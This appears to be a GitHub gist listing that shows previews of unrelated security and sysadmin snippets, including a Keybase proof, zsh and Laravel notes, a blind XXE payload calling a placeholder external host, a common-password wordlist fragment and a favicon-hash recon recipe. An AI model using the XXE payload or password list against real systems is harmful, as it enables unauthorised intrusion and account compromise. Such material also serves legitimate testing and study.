I hereby claim:
- I am vortexau on github.
- I am vortex (https://keybase.io/vortex) on keybase.
- I have a public key whose fingerprint is 6352 BBF9 D34C 198D 0B05 8C05 F79D 4BF6 C555 4446
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
Quick Walkthrough for Ew Skuzzy!
A Laravel 5.1 Application behind a BigIP F5 load-balancer applicance, which performed the SSL termination. The traffic from F5 to Laravel is only over Port 80 (internal 'secure' network) and Laravel itself thinks it is insecure, and thus all URLs to internal resources were 'http'. We also wanted to maintain the ability to serve certain unauthenticated content over HTTP.
These F5 load-balancers can roll all connections up to HTTPS, however in this instance we did not wish to perform this as the Laravel application is designed to intercept connections for another decommissioned application which served SSL and Non-SSL connections.
# Custom hosts completion from included SSH configs: | |
zstyle -e ':completion:*:hosts' hosts 'reply=( | |
${=${=${=${${(f)"$(cat {/etc/ssh_,~/.ssh/known_}hosts(|2)(N) 2>/dev/null)"}%%[#| ]*}//\]:[0-9]*/ }//,/ }//\[/ } | |
${=${(f)"$(cat /etc/hosts(|)(N) <<(ypcat hosts 2>/dev/null))"}%%\#*} | |
${=${${${${(@M)${(f)"$(cat ~/.ssh/config 2>/dev/null)"}:#Host *}#Host }:#*\**}:#*\?*}} | |
${=${${${${(@M)${(f)"$(cat ~/.ssh/config.d/* 2>/dev/null)"}:#Host *}#Host }:#*\**}:#*\?*}} | |
)' | |
# The last line above supports reading from files inside a local SSH configuration directory. It pulls |
Version 1
Debian installed as VM. Single Struts app, just to test the install process.
apt-get update && apt-get -y upgrade
apt-get install tomcat8 maven
cd to project directory
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
#!/usr/bin/env python | |
import paramiko | |
import base64 | |
# Run in /mnt/c/Users/<username>/AppData/Local/Xamarin/MonoTouch | |
# Unfortunately this does NOT work yet, as I do not understand the passphrase.key | |
# file contents entirely (it appears to be bytes inside the base64 encoded string) | |
# and how to use it as the SSH key. | |
with open("passphrase.key", 'r') as file: |
javascript:d=document;b=d.createElement`textarea`;c=d.getSelection();b.textContent=[...d.querySelectorAll`div.r>a:first-child`].map(n=>n.href).join`\n`;d.body.appendChild(b);c.removeAllRanges();b.select();d.execCommand`copy`;d.body.removeChild(b) |
!23qweASD | |
0Z0mQ130F65E8wD | |
123 | |
1234 | |
123456 | |
12345678 | |
123456789 | |
1234root5678 | |
123plop321 | |
132vaslliwemvljm9 |
# https://twitter.com/brsn76945860/status/1171233054951501824 | |
pip install mmh3 | |
----------------------------- | |
# python 2 | |
import mmh3 | |
import requests | |
response = requests.get('https://cybersecurity.wtf/favicon.ico') | |
favicon = response.content.encode('base64') |